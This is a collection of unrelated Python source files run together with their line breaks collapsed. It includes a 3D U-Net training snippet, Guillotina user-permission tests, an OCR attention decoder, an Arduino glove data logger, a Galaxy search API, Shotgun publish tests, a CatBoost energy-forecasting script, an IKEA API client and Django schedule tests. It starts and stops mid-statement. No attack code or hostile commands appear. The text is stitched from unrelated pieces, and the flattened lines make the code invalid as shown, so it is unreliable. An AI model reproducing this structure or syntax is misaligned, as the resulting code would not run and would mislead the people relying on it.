mask.astype(np.float32) net = unet3d(params={'nchannels':2}) lr=2e-3 # optimizer = optim.RMSprop(net.parameters(), lr=lr, weight_decay=1e-8, # momentum=0.9) optimizer = torch.optim.Adam(net.parameters(), lr=lr, weight_decay=0.0005) criterion = nn.BCEWithLogitsLoss() for i in range(200): _bx, _bm = get_batch(12, x, mask) # _bx, _bm = get_one_mem(12, x, mask) # if i == 0: # plt.imshow(_bx[0, 0,2,:,:]) # plt.show() res = net(_bx) loss = criterion(res, _bm) optimizer.zero_grad() loss.backward() optimizer.step() if i % 10 == 0: print(i, loss) # return net(torch.from_numpy(x[:, 5:13, 100:228, 
100:228][np.newaxis])) return res #net(_bx) def test(): print(unet3d) net = unet3d(params={'nchannels':2}) print(net) res = torch.sigmoid(train()).detach().numpy() plt.imshow(res[0,0,:,:,:].max(axis=0)) plt.show()guillotina/tests/dbusers/test_api.py from . import settings from guillotina.tests.utils import get_container import base64 import json import pytest pytestmark = pytest.mark.asyncio @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_add_user(dbusers_requester): async with dbusers_requester as requester: # Create a user _, status_code = await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) assert status_code == 201 # Check user is created in the apropriate folder container = await get_container(requester=requester) users = await container.async_get("users") assert await users.async_contains("foobar") @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_add_user_id_email(dbusers_requester): async with dbusers_requester as requester: # Create a user _, status_code = await requester( "POST", "/db/guillotina/users", data=json.dumps(settings.user_data_id_email) ) assert status_code == 201 # Check user is created in the apropriate folder container = await get_container(requester=requester) users = await container.async_get("users") assert await users.async_contains("") @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_user_auth(dbusers_requester): async with dbusers_requester as requester: await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) # user should be able to add content to object resp, status_code = await requester( "POST", "/db/guillotina/users/foobar", data=json.dumps({"@type": "Item", "id": "foobaritem", "title": "foobar"}), token=base64.b64encode(b"foobar:password").decode("ascii"), auth_type="Basic", ) assert status_code == 201 container = await get_container(requester=requester) users = await container.async_get("users") foobar = await users.async_get("foobar") assert await foobar.async_contains("foobaritem") @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_login(dbusers_requester): async with dbusers_requester as requester: await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) # Login as new user resp, status_code = await requester( "POST", "/db/guillotina/@login", data=json.dumps({"username": "foobar", "password": "password"}) ) assert status_code == 200 # User should have access to its own folder _, status_code = await requester( "GET", "/db/guillotina/users/foobar", token=resp["token"], auth_type="Bearer" ) assert status_code == 200 @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_refresh(dbusers_requester): async with dbusers_requester as requester: # Create a user _, status_code = await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) assert status_code == 201 # Login resp, status_code = await requester( "POST", "/db/guillotina/@login", data=json.dumps({"username": "foobar", "password": "password"}) ) assert status_code == 200 # Attempt renew resp, status_code = await requester( "POST", "/db/guillotina/@login-renew", token=resp["token"], auth_type="Bearer" ) assert status_code == 200 assert "token" in resp async def create_user(requester, user_id, user_data=None): user_data = user_data or {} user_data["id"] = user_id data = {"@type": "User"} data.update(user_data) _, status_code = await requester("POST", "/db/guillotina/users", data=json.dumps(data)) assert 
status_code == 201 async def login_user(requester, username, password): resp, status_code = await requester( "POST", "/db/guillotina/@login", data=json.dumps({"username": username, "password": password}) ) assert status_code == 200 return resp["token"] async def create_and_login_user(requester, user_id, password, roles): await create_user(requester, user_id, user_data={"password": password, "user_roles": roles}) return await login_user(requester, user_id, password) async def _test_endpoint_access( requester, method, url, data=None, allowed_roles=None, count=1 ): # pragma: no cover data = data or {} allowed_roles = allowed_roles or [] all_roles = [ "guillotina.Manager", "guillotina.ContainerAdmin", "guillotina.Member", "guillotina.ContainerCreator", "guillotina.ContainerDeleter", ] for index, role in enumerate(all_roles): # Get a random user id uid = f"user-{index}-{count}" token = await create_and_login_user(requester, uid, "password", roles=[role]) # Try creating a user now _, status_code = await requester(method, url, data=json.dumps(data), auth_type="Bearer", token=token) assert status_code != 500 if role in allowed_roles: assert status_code != 401 else: assert status_code == 401 @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_only_root_and_admins_can_create_users(dbusers_requester): async with dbusers_requester as requester: await _test_endpoint_access( requester, "POST", "/db/guillotina/users", allowed_roles=["guillotina.Manager", "guillotina.ContainerAdmin"], ) @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_only_root_and_admins_can_manage_users_and_groups(dbusers_requester): async with dbusers_requester as requester: count = 1 for method, url in [ ("GET", "@users"), ("GET", "@users/foo"), ("PATCH", "@users/foo"), ("DELETE", "@users/foo"), ("GET", "@groups"), ("GET", "@groups/foo"), ("PATCH", "@groups/foo"), ("DELETE", "@groups/foo"), ]: await _test_endpoint_access( requester, method, "/db/guillotina/" + url, allowed_roles=["guillotina.Manager", "guillotina.ContainerAdmin"], count=count, ) count += 1 import torch import torch.nn as nn import torch.nn.functional as F device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') class PositionwiseFeedForward(nn.Module): ''' A two-feed-forward-layer module ''' def __init__(self, d_in, d_hid, dropout=0.1): super(PositionwiseFeedForward, self).__init__() self.w_1 = nn.Conv1d(d_in, d_hid, 1) # position-wise self.w_2 = nn.Conv1d(d_hid, d_in, 1) # position-wise self.layer_norm = nn.LayerNorm(d_hid) def forward(self, x): output = self.w_1(x.transpose(1, 2)).transpose(1, 2) output = F.relu(self.layer_norm(output)) output = self.w_2(output.transpose(1, 2)).transpose(1, 2) return output class Attention(nn.Module): def __init__(self, input_size, hidden_size, num_class, num_char_embeddings=256, projection_type="pff"): super(Attention, self).__init__() self.attention_cell = AttentionCell(input_size, hidden_size, num_char_embeddings) self.hidden_size = hidden_size self.num_class = num_class if projection_type == "pff": self.projection_head = PositionwiseFeedForward( hidden_size, hidden_size // 4) elif projection_type == 'linear': self.projection_head = nn.Linear(hidden_size, hidden_size) else: assert False, 'no projection type name %s!' 
% projection_type self.generator = nn.Linear(hidden_size, num_class) self.char_embeddings = nn.Embedding(num_class, num_char_embeddings) def forward(self, batch_H, text, is_train=True, batch_max_length=25, use_project=False, return_local_feat=False): """ input: batch_H : contextual_feature H = hidden state of encoder. [batch_size x num_steps x num_class] text : the text-index of each image. [batch_size x (max_length+1)]. +1 for [SOS] token. text[:, 0] = [SOS]. output: probability distribution at each step [batch_size x num_steps x num_class] """ batch_size = batch_H.size(0) num_steps = batch_max_length + 1 # +1 for [EOS] at end of sentence. output_hiddens = torch.cuda.FloatTensor(batch_size, num_steps, self.hidden_size).fill_(0) local_feats = torch.cuda.FloatTensor(batch_size, num_steps, self.hidden_size).fill_(0) hidden = (torch.cuda.FloatTensor(batch_size, self.hidden_size).fill_(0), torch.cuda.FloatTensor(batch_size, self.hidden_size).fill_(0)) if is_train: for i in range(num_steps): char_embeddings = self.char_embeddings(text[:, i]) # hidden : decoder's hidden s_{t-1}, batch_H : encoder's hidden H, char_embeddings : f(y_{t-1}) hidden, alpha, context = self.attention_cell( hidden, batch_H, char_embeddings) output_hiddens[:, i, :] = hidden[ 0] # LSTM hidden index (0: hidden, 1: Cell) local_feats[:, i, :] = context if use_project: output_hiddens = self.projection_head(output_hiddens) probs = self.generator(output_hiddens) if return_local_feat: return probs, local_feats else: return probs else: targets = text[0].expand( batch_size) # should be fill with [SOS] token probs = torch.cuda.FloatTensor(batch_size, num_steps, self.num_class).fill_(0) confident_list = torch.cuda.FloatTensor(batch_size).fill_(0) for i in range(num_steps): char_embeddings = self.char_embeddings(targets) hidden, alpha, _ = self.attention_cell(hidden, batch_H, char_embeddings) part1, part2 = hidden if use_project: part1 = self.projection_head(part1) hidden = (part1, part2) probs_step = self.generator(hidden[0]) probs[:, i, :] = probs_step probs_step = F.log_softmax(probs_step, dim=-1) scores_step, next_input = probs_step.max(1) confident_list += scores_step targets = next_input return probs # batch_size x num_steps x num_class class AttentionCell(nn.Module): def __init__(self, input_size, hidden_size, num_embeddings): super(AttentionCell, self).__init__() self.i2h = nn.Linear(input_size, hidden_size, bias=False) self.h2h = nn.Linear(hidden_size, hidden_size) # either i2i or h2h should have bias self.score = nn.Linear(hidden_size, 1, bias=False) self.rnn = nn.LSTMCell(input_size + num_embeddings, hidden_size) self.hidden_size = hidden_size def forward(self, prev_hidden, batch_H, char_embeddings): # [batch_size x num_encoder_step x num_channel] -> [batch_size x num_encoder_step x hidden_size] batch_H_proj = self.i2h(batch_H) prev_hidden_proj = self.h2h(prev_hidden[0]).unsqueeze(1) e = self.score( torch.tanh(batch_H_proj + prev_hidden_proj)) # batch_size x num_encoder_step * 1 alpha = F.softmax(e, dim=1) context = torch.bmm(alpha.permute(0, 2, 1), batch_H).squeeze(1) # batch_size x num_channel concat_context = torch.cat( [context, char_embeddings], 1) # batch_size x (num_channel + num_embedding) cur_hidden = self.rnn(concat_context, prev_hidden) return cur_hidden, alpha, context src/squad/engine/messaging/endpoints/__init__.py from .arduino import ArduinoEndpoint __all__ = [ "ArduinoEndpoint", ] papoutsa20/Capstone-Sign-Glove import serial import time import keyboard import os ser = serial.Serial('COM4', 9600, timeout=2) 
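# --- Illustrative aside (not part of the original logger) --------------------
# The capture loop that follows waits for a spacebar press, stores one raw
# serial line per press, and finally writes the lines out to per-letter CSV
# files. A minimal, self-contained sketch of the underlying read-decode-write
# pattern with pyserial is shown below; the function name, port, baud rate and
# output path are hypothetical.
import csv
import serial  # pyserial

def capture_samples(port='COM4', baud=9600, n_samples=5, out_path='samples.csv'):
    """Read n_samples newline-terminated readings and append them to a CSV file."""
    conn = serial.Serial(port, baud, timeout=2)
    try:
        with open(out_path, 'a', newline='') as f:
            writer = csv.writer(f)
            for _ in range(n_samples):
                line = conn.readline().decode('utf-8', errors='replace').strip()
                if line:  # skip empty reads caused by a timeout
                    writer.writerow(line.split(','))
    finally:
        conn.close()

# Hypothetical usage: capture_samples(port='COM4', n_samples=10)
# ------------------------------------------------------------------------------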
#ser = serial.Serial('/dev/cu.usbmodem14201', 9600, timeout=2) ser.reset_input_buffer() amount = 50 letters = 'Z' # = is a neutral hand position letters = letters * amount #letters = 'W' results = [] count = 0 while(count < len(letters)): data = ser.readline() print(letters[count]) print(data) #print(ser.in_waiting) if keyboard.is_pressed('space'): print("got it") count +=1 results.append(data) print(results) name = "Jason4" for i,letter in enumerate(letters): data_path = os.path.join(os.path.dirname(__file__), 'data', '{}'.format(letter)) if not os.path.exists(data_path): os.makedirs(data_path) with open(os.path.join(os.path.dirname(__file__), 'data', '{}'.format(letter), '{}.csv'.format(name.replace(' ','_'))), 'a', 777) as f: f.write(results[i].decode('utf-8')) #time.sleep(1) #print(ser.read(ser.in_waiting)) #ser.reset_input_buffer() #while(True): #time.sleep(1) #print(ser.read(ser.in_waiting)) #print("\n") #time.sleep(6) #print(ser.read(ser.in_waiting)) #print("\n") #time.sleep(3) #print(ser.read(ser.in_waiting)) #print("\n") #time.sleep(3) #print(ser.read(ser.in_waiting)) #print("\n") """ API for searching Galaxy Datasets """ import logging from galaxy import web from galaxy.exceptions import ItemAccessibilityException from galaxy.model.search import GalaxySearchEngine from galaxy.util import unicodify from galaxy.webapps.base.controller import ( BaseAPIController, SharableItemSecurityMixin ) log = logging.getLogger(__name__) class SearchController(BaseAPIController, SharableItemSecurityMixin): @web.legacy_expose_api def create(self, trans, payload, **kwd): """ POST /api/search Do a search of the various elements of Galaxy. """ query_txt = payload.get("query", None) out = [] if query_txt is not None: se = GalaxySearchEngine() try: query = se.query(query_txt) except Exception as e: return {'error': unicodify(e)} if query is not None: query.decode_query_ids(trans) current_user_roles = trans.get_current_user_roles() try: results = query.process(trans) except Exception as e: return {'error': unicodify(e)} for item in results: append = False if trans.user_is_admin: append = True if not append: if type(item) in [trans.app.model.LibraryFolder, trans.app.model.LibraryDatasetDatasetAssociation, trans.app.model.LibraryDataset]: if (trans.app.security_agent.can_access_library_item(trans.get_current_user_roles(), item, trans.user)): append = True elif type(item) in [trans.app.model.Job]: if item.used_id == trans.user or trans.user_is_admin: append = True elif type(item) in [trans.app.model.Page, trans.app.model.StoredWorkflow]: try: if self.security_check(trans, item, False, True): append = True except ItemAccessibilityException: append = False elif type(item) in [trans.app.model.PageRevision]: try: if self.security_check(trans, item.page, False, True): append = True except ItemAccessibilityException: append = False elif hasattr(item, 'dataset'): if trans.app.security_agent.can_access_dataset(current_user_roles, item.dataset): append = True if append: row = query.item_to_api_value(item) out.append(self.encode_all_ids(trans, row, True)) return {'results': out} 10-100 from pastiche.pastiche import __version__ vfxetc/sgpublish1-10 from common import * from sgpublish import versions class TestVersions(TestCase): def setUp(self): sg = Shotgun() self.sg = self.fix = fix = Fixture(sg) self.proj_name = 'Test Project ' + mini_uuid() proj = fix.Project(self.proj_name) seq = proj.Sequence('AA', project=proj) shot = seq.Shot('AA_001', project=proj) step = fix.find_or_create('Step', code='Anm', 
short_name='Anm') task = shot.Task('Animate Something', step=step, entity=shot, project=proj) self.proj = minimal(proj) self.seq = minimal(seq) self.shot = minimal(shot) self.step = minimal(step) self.task = minimal(task) self.session = Session(self.sg) self.sgfs = SGFS(root=self.sandbox, session=self.session, schema_name='testing') self.sgfs.create_structure([self.task], allow_project=True) self = None # For GC (?) def test_promote_one(self): scene_path = os.path.join(self.sandbox, 'test_scene.ma') open(scene_path, 'w').write('this is a dummy scene') with Publisher(name='test_scene', type="maya_scene", link=self.task, sgfs=self.sgfs) as publisher: publisher.add_file(scene_path) publish = publisher.entity version = versions.create_version_from_publish(publish, {}, sgfs=self.sgfs) self.assertEqual(publish['sg_version'], 1) self.assertEqual(publish['code'], 'test_scene') self.assertEqual(version['code'], 'test_scene_v0001') # TODO: There is a LOT more to assert here, but at least it ran! def test_promote_many(self): scene_path = os.path.join(self.sandbox, 'test_scene.ma') open(scene_path, 'w').write('this is a dummy scene') with Publisher(name='test_scene', type="maya_scene", link=self.task, sgfs=self.sgfs) as publisher: publisher.add_file(scene_path) publish = publisher.entity entities = versions.create_versions_for_publish(publish, [ dict(code='version_a', sg_path_to_movie='/path/to/a.mov'), dict(code='version_b', sg_path_to_movie='/path/to/b.mov'), ], sgfs=self.sgfs) self.assertEqual(publish['sg_version'], 1) self.assertEqual(publish['code'], 'test_scene') self.assertEqual(entities[0]['code'], 'version_a') self.assertEqual(entities[1]['code'], 'version_b') self.assertEqual(entities[0]['sg_path_to_movie'], '/path/to/a.mov') self.assertEqual(entities[1]['sg_path_to_movie'], '/path/to/b.mov') # TODO: There is a LOT more to assert here, but at least it ran! import os, sys,site,pyodbc , pandas as pd,numpy as np , imp,sys,yaml , matplotlib.pyplot as plt , gc ,csv from dateutil import parser from datetime import date, timedelta from dateutil.relativedelta import relativedelta from catboost import CatBoostRegressor, Pool from pylab import rcParams from datetime import datetime from copy import deepcopy from pathlib import Path #path ="/Boris/Projects/Brain/Energy_prediction_Competition-Kasun/Code_submitted" path = Path(__file__).parents[0].absolute() # parents[0] => go one back ( like ../) to folder where the current __file__ is located os.chdir(path) print(path) import Aux_Energy_prediction_Competition as Aux_Energy imp.reload(Aux_Energy) ################################################ #Set required col names ######################## ################################################ def set_config(is_to_plot = True,is_to_standardize=False): ############################### #Set configuration object ############################### agg_level={"months":0,'days':1} item_col ="meter_id" ; y_label ="energy_agg" ; date_column ='date_only' ; pred_col = "prediction" y_label_original_col = y_label #+ "_original" # key_id_col = "key_ID" key_columns = [item_col] #Horize is 14 days ahead ! 
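# (Added note) The assignment below sets the horizon to 365 daily units, i.e. a full year of
# daily forecasts; the "14 days ahead" remark above appears to be a stale comment.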
total_future_UNITS_to_forecast = horizon = 365 losses_function_optimize = "Quantile:alpha=0.45"#"RMSE" is_residual_based_model = False #Create configuration object with all column setups conf_obj = Aux_Energy.Configuration_class(agg_level = agg_level.copy(), item_col =item_col ,\ date_column=date_column, pred_col=pred_col, y_label = y_label, y_label_original_col = y_label_original_col, key_columns =key_columns , total_future_UNITS_to_forecast = total_future_UNITS_to_forecast, losses_function_optimize = losses_function_optimize, is_residual_based_model = is_residual_based_model, is_to_plot = is_to_plot,is_to_standardize=is_to_standardize) return(conf_obj) ##################################################################### #Predict the test set ##################################################################### #def predict_on_test(all_given_data_df,test_data_to_predict,CB_model,x_columns_numeric_to_remain , x_CAT_cols_to_remain , conf_obj) : def predict_on_test(all_given_data_df,test_data_to_predict,CB_model,x_columns_all, cat_features , conf_obj) : #Get months name all_given_data_df['month_name'] = all_given_data_df[conf_obj.date_column].map(lambda x : x.strftime('%b'))#Get months name ################################# #Predict on all given (trained) ################################# all_given_data_to_predict_pool = Pool( data = all_given_data_df[x_columns_all ].copy(), cat_features = cat_features ) predictions = CB_model.predict(all_given_data_to_predict_pool) #No negative predictions - BUT for residuals based solution there are ! if conf_obj.is_residual_based_model == False: predictions[predictions < 0] = 0 #Set predictions for the TRAIN set all_given_data_df.loc[:,conf_obj.pred_col] = predictions ################## #Predict on test ################# test_data_to_predict_pool = Pool( data = test_data_to_predict[x_columns_all ].copy(), cat_features = cat_features ) predictions = CB_model.predict(test_data_to_predict_pool) predictions[predictions < 0] = 0 #Set predictions for the TEST set test_data_to_predict.loc[:,conf_obj.pred_col] = predictions ################################################################### #Run Shap go get shaply values per each sample in data to predict ################################################################### #Set_of_TS_Models.run_shap_models(CB_model , x_train = df_full[x_columns_numeric + CAT_cols ]) (shaply_values,shaply_values_as_DF,shap_explainer) = \ Aux_Energy.get_shaply_values_from_Catboost(CB_model ,\ x_train = test_data_to_predict[x_columns_all ].copy(),\ x_train_pool = test_data_to_predict_pool , is_to_plot = False) assert(len(shaply_values)==len(test_data_to_predict)),"Must have shaply value per row in shap_values !" assert(len(shaply_values_as_DF)==len(test_data_to_predict)),"Must have shaply value per row in shap_values !" ####################################################################### #Add key columns to shaply values df - to be able to do group by ! 
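# (Added sketch, assumptions flagged.) Aux_Energy.get_shaply_values_from_Catboost is not shown
# in this file; CatBoost exposes per-sample SHAP values directly, so the helper is assumed to
# wrap something along the lines of the commented snippet below, where the extra last column
# returned by CatBoost holds the expected (base) value and is dropped:
#   raw_shap = CB_model.get_feature_importance(data=test_data_to_predict_pool, type='ShapValues')
#   shap_df = pd.DataFrame(raw_shap[:, :-1], columns=x_columns_all)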
####################################################################### #shaply_values_as_DF.loc[:,conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col]] = test_data_to_predict[conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col]] cols = list(shaply_values_as_DF.columns) + conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col] shaply_values_as_DF = pd.concat([shaply_values_as_DF , test_data_to_predict[conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col]] ],axis=1 , ignore_index=True) shaply_values_as_DF.columns = cols assert( np.all(shaply_values_as_DF[conf_obj.pred_col]==test_data_to_predict[conf_obj.pred_col]) ) ,"Sanity for prediction assignments was failed !" shaply_values_as_DF.loc[:,"month_name"] = test_data_to_predict[conf_obj.date_column].map(lambda x : x.strftime('%b'))#Get months name #Verify that I have the same number of smaples to predict per each meter id & the number is EQUAL to the horizon length assert(shaply_values_as_DF.groupby(by="meter_id")[conf_obj.date_column].count().sort_values(ascending =False).value_counts().nunique() ==1) assert(shaply_values_as_DF.groupby(by="meter_id")[conf_obj.date_column].count().value_counts().index[0] ==conf_obj.total_future_UNITS_to_forecast) #shaply_values_as_DF.to_csv("shaply_values_as_DF.csv",index=False) ################################################################### #Remove day/energy_mean of month from the shap values ################################################################### """ Based in "feature_importance_based_on_Shaply_values" day of month (1,2,3,....31) & energy_mean of last year have high impact on daily prediction. BUT we are aggregating by month and year so day of month isn't intersting' """ #shaply_values_as_DF_bck = shaply_values_as_DF.copy() x_columns_all_filtered = x_columns_all.copy() cols_to_remove =["day","energy_mean"] for col_to_drop in cols_to_remove : if col_to_drop not in x_columns_all: continue print(col_to_drop , "was dropped from text explanation generator ! 
") shaply_values_as_DF.drop([col_to_drop],axis=1,inplace=True) # Remove more than one attribute x_columns_all_filtered.remove(col_to_drop) #remove from x_columns as well ###################################################################### #Columns that can be adapted to decrease/increase energy consumptions ###################################################################### #Numeric attributes (taken from "DataDescription-FUZZ.pdf" file # which explains each attribute in the data input) cols_that_changing_them_may_influnce_on_energy_consumptions = ['dishwasher', 'freezer', 'fridge_freezer', 'refrigerator', 'tumble_dryer', \ 'washing_machine', 'game_console', 'laptop', 'pc', 'router', 'set_top_box', 'tablet', 'tv'] cols_that_changing_them_may_influnce_on_energy_consumptions_df = pd.DataFrame(cols_that_changing_them_may_influnce_on_energy_consumptions,columns=["changeable_cols"]) ###################################################################### #Generate results ###################################################################### #Get sum of energy consumption per each type of household meta_data_cols = ["dwelling_type","num_occupants","month_name"] sum_energy_consumption_observed_per_month_per_similar_households = all_given_data_df.groupby(by=conf_obj.key_columns + meta_data_cols)['energy_agg'].sum().reset_index() #get sum of usage sum_energy_consumption_observed_per_month_per_similar_households = sum_energy_consumption_observed_per_month_per_similar_households.groupby(by= meta_data_cols)['energy_agg'].mean().reset_index() #get mean of all sums sum_energy_consumption_observed_per_month_per_similar_households[:4] # dwelling_type num_occupants month_name energy_agg # bungalow 1.000 Aug 145.682 # bungalow 1.000 Dec 113.216 # bungalow 1.000 Jul 137.695 # bungalow 1.000 Nov 151.553 cols = ["meter_id" ,"AnnualPRED","AnnualEXP","JanPRED","JanEXP","FebPRED","FebEXP","MarPRED","MarEXP","AprPRED","AprEXP","MayPRED","MayEXP","JunPRED","JunEXP","JulPRED","JulEXP","AugPRED","AugEXP","SepPRED","SepEXP","OctPRED","OctEXP","NovPRED","NovEXP","DecPRED","DecEXP"] #cols = cols.replace("\t",",") #pandarallel.initialize(nb_workers= int(os.cpu_count())-1, use_memory_fs = False ,progress_bar = False) #set num of cores ; parallel_apply ans_df = all_given_data_df.groupby(by = conf_obj.key_columns,as_index=False).apply(generate_results_per_meter_id,shaply_values_as_DF,\ cols_that_changing_them_may_influnce_on_energy_consumptions_df, sum_energy_consumption_observed_per_month_per_similar_households, meta_data_cols,\ conf_obj=conf_obj,x_columns = x_columns_all_filtered,top_n_features =3).reset_index(drop=True) ans_df.columns = cols assert(all_given_data_df.meter_id.nunique() == len(ans_df)) #string_cols = [col for col in cols if "EXP" in col] #ans_df[string_cols] = ans_df[string_cols].astype(str) #ans_df.to_csv("results_to_submit_21.csv",index = False,quoting=csv.QUOTE_NONNUMERIC) return(ans_df) ################################################################### ######################## Generate results per meter id ############ ################################################################### def generate_results_per_meter_id(sub_df_per_meter_id , shaply_values_as_DF ,cols_that_changing_them_may_influnce_on_energy_consumptions_df,\ sum_energy_consumption_observed_per_month_per_similar_households,meta_data_cols, conf_obj ,x_columns,top_n_features = 3) : #Get examined meter_id meter_id = sub_df_per_meter_id[conf_obj.item_col].unique()[0] assert(sub_df_per_meter_id[conf_obj.item_col].nunique()==1),"Only ONE 
unique meter-id MUST be here !" #print(meter_id) ########################## #Shap get yearly values ########################## shap_sub_df = shaply_values_as_DF[shaply_values_as_DF[conf_obj.item_col] ==meter_id].copy() shap_importance_yearly = Aux_Energy.get_importance_per_meter_id(shap_sub_df,conf_obj, x_columns = x_columns) #Per all sub_df NOT per month shap_importance_yearly = shap_importance_yearly.sort_values(by="importance_mean",ascending=False) # sort from high to low "importance_mean" #################################### #Actual values yearly and monthly #################################### sum_energy_consumption_observed_per_month = sub_df_per_meter_id.groupby(by='month_name')['energy_agg'].sum() #actual monthly total energy consumption # month_name # Aug 130.809 # Dec 202.446 # Jul 140.212 # Jun 144.041 # May 116.811 # Nov 268.866 # Oct 153.194 # Sep 116.803 sum_energy_consumption_observed_per_year = sum_energy_consumption_observed_per_month.values.sum()#actual yearly total energy consumption #809 ######################################## #Model's predictions yearly and monthly ######################################## sum_energy_consumption_predicted_per_month = shap_sub_df.groupby(by='month_name')[conf_obj.pred_col].sum() #predicted monthly total energy consumption num_of_observed_unique_months = len(sum_energy_consumption_observed_per_month) #num of historical months # month_name # Apr 213.894 # Aug 179.024 # Dec 210.261 # Feb 246.805 # Jan 275.645 # Jul 184.403 # Jun 182.607 # Mar 241.389 # May 143.624 # Nov 240.507 # Oct 177.348 # Sep 168.336 sum_energy_consumption_predicted_per_year = sum_energy_consumption_predicted_per_month.values.sum() #predicted yearly total energy consumption #2463.843 ################################################################################ #For meter ids without full data cycle (no 12 months in the history) #so use similar arhouseholds ################################################################################ #To get usage for the similar meta data families sum_energy_consumption_observed_per_month_per_similar_households_selected =\ sum_energy_consumption_observed_per_month_per_similar_households.merge(sub_df_per_meter_id[meta_data_cols].drop_duplicates(), left_on = meta_data_cols, right_on = meta_data_cols, how='inner').copy() assert(len(sum_energy_consumption_observed_per_month_per_similar_households_selected) > 0 ),"must be data after the inner join!" 
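# (Added sketch, hedged.) Aux_Energy.get_importance_per_meter_id is not shown here; since its
# result is sorted by an "importance_mean" column above, it is assumed to reduce the per-sample
# SHAP values to a mean absolute contribution per feature, roughly:
#   importance_mean = shap_sub_df[x_columns].abs().mean()
#   shap_importance_yearly = (importance_mean.rename("importance_mean").rename_axis("feature")
#                             .reset_index().sort_values(by="importance_mean", ascending=False))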
#Get predictions + auto generated text for yearly aggregations yearly_result = Aux_Energy.generate_yearly_prediction_with_auto_generated_message(sum_energy_consumption_observed_per_year,sum_energy_consumption_predicted_per_year,\ shap_importance_yearly ,cols_that_changing_them_may_influnce_on_energy_consumptions_df, top_n_features ,num_of_observed_unique_months = num_of_observed_unique_months) #List of month names #list_of_month_names = shaply_values_as_DF['month_name'].unique() list_of_month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] #Get predictions + auto generated text for monthly aggregations monthly_result = Aux_Energy.generate_monthly_prediction_with_auto_generated_message(sum_energy_consumption_observed_per_month , sum_energy_consumption_predicted_per_month,\ sum_energy_consumption_observed_per_month_per_similar_households_selected ,\ cols_that_changing_them_may_influnce_on_energy_consumptions_df.copy(),\ shap_sub_df,top_n_features,conf_obj,x_columns ,list_of_month_names ) #Combine between yearly & monthly yearly_result.extend(monthly_result) yearly_result = [meter_id] + yearly_result yearly_result_df = pd.DataFrame(yearly_result).T return(yearly_result_df) def main(): #Set font size rcParams['figure.figsize'] = 16, 4 #14, 5 #Set configuration object conf_obj = set_config(is_to_plot =True ,is_to_standardize =True ) #Load the data (X_train, X_valid, y_train, y_valid,df_combined,test_data_to_predict,x_columns,cat_features,conf_obj) = Aux_Energy.load_data(path,conf_obj) #Train a model CB_last_model = Aux_Energy.execute_the_modeling_process(X_train, X_valid, y_train, y_valid,test_data_to_predict,x_columns,cat_features,conf_obj) #Shaply + explain the results results_to_submit_df = predict_on_test(X_train,test_data_to_predict, CB_last_model, x_columns , cat_features,conf_obj) #Store the results to csv results_to_submit_df.to_csv("results_to_submit_ver_X.csv",index = False,quoting=csv.QUOTE_NONNUMERIC) if __name__ == "__main__": main() from __future__ import annotations from typing import Any from ikea_api.abc import Endpoint, SessionInfo, endpoint from ikea_api.base_ikea_api import BaseIkeaAPI from ikea_api.error_handlers import ( handle_401, handle_json_decode_error, handle_not_success, ) from ikea_api.exceptions import ItemFetchError class IngkaItems(BaseIkeaAPI): def _get_session_info(self): headers = self._extend_default_headers( { "Accept": "*/*", "Referer": f"{self._const.local_base_url}/order/delivery/", "X-Client-Id": "c4faceb6-0598-44a2-bae4-2c02f4019d06", } ) url = f"https://api.ingka.ikea.com/salesitem/communications/{self._const.country}/{self._const.language}" return SessionInfo(base_url=url, headers=headers) @endpoint(handlers=[handle_json_decode_error, handle_401, handle_not_success]) def get_items(self, item_codes: list[str]) -> Endpoint[dict[str, Any]]: response = yield self._RequestInfo("GET", params={"itemNos": item_codes}) if "error" in response.json: try: msg = response.json["error"]["details"][0]["value"]["keys"] except (KeyError, TypeError, IndexError): msg = None raise ItemFetchError(response, msg) return response.json from django.contrib.auth import get_user_model from django.test import TestCase from django.urls import reverse from symposion.proposals.models import ProposalBase from symposion.schedule.models import Presentation from symposion.schedule.tests.factories import ( SectionFactory, ProposalKindFactory, SlotFactory ) from symposion.speakers.models import Speaker class ScheduleJSONViewTestCase(TestCase): 
"""Automated test cases for schedule_json view.""" def test_empty_schedule(self): """Verify that an empty schedule returns empty JSON.""" response = self.client.get(reverse("schedule_json")) # The JSON should contain an empty element named "schedule". self.assertContains( response=response, text="schedule", status_code=200 ) self.assertEqual(len(response.json()["schedule"]), 0) def test_presentation_count(self): PRESENTATION_COUNT = 5 SlotFactory.create_batch(size=PRESENTATION_COUNT) response = self.client.get(reverse("schedule_json")) self.assertEqual(len(response.json()["schedule"]), PRESENTATION_COUNT) def test_slot_override(self): """Verify that slot.content_override displays in JSON.""" OVERRIDDEN_CONTENT = "**FOOBAR**" slot = SlotFactory() slot.content_override = OVERRIDDEN_CONTENT slot.save() response = self.client.get(reverse("schedule_json")) self.assertContains( response=response, text=OVERRIDDEN_CONTENT, status_code=200 ) def test_presentation_data(self): """Verify that a presentation's content appears.""" TALK_TITLE = "Presentation Content Verification Testing for Snakes" DESCRIPTION_CONTENT = "It was a bright cold day in April..." ABSTRACT_CONTENT = "...the color of television tuned to a dead channel" user_model = get_user_model() user = user_model.objects.create( username="test", email="", first_name="Test", last_name="User", ) speaker = Speaker.objects.create(user=user, name="Speaker") section = SectionFactory() proposal_kind = ProposalKindFactory() # We don't use factories so that all title/description/abstract # information is synchronized between the ProposalBase and the # Presentation. proposal_base = ProposalBase.objects.create( title=TALK_TITLE, description=DESCRIPTION_CONTENT, abstract=ABSTRACT_CONTENT, speaker=speaker, kind=proposal_kind, ) presentation = Presentation.objects.create( title=TALK_TITLE, description=DESCRIPTION_CONTENT, 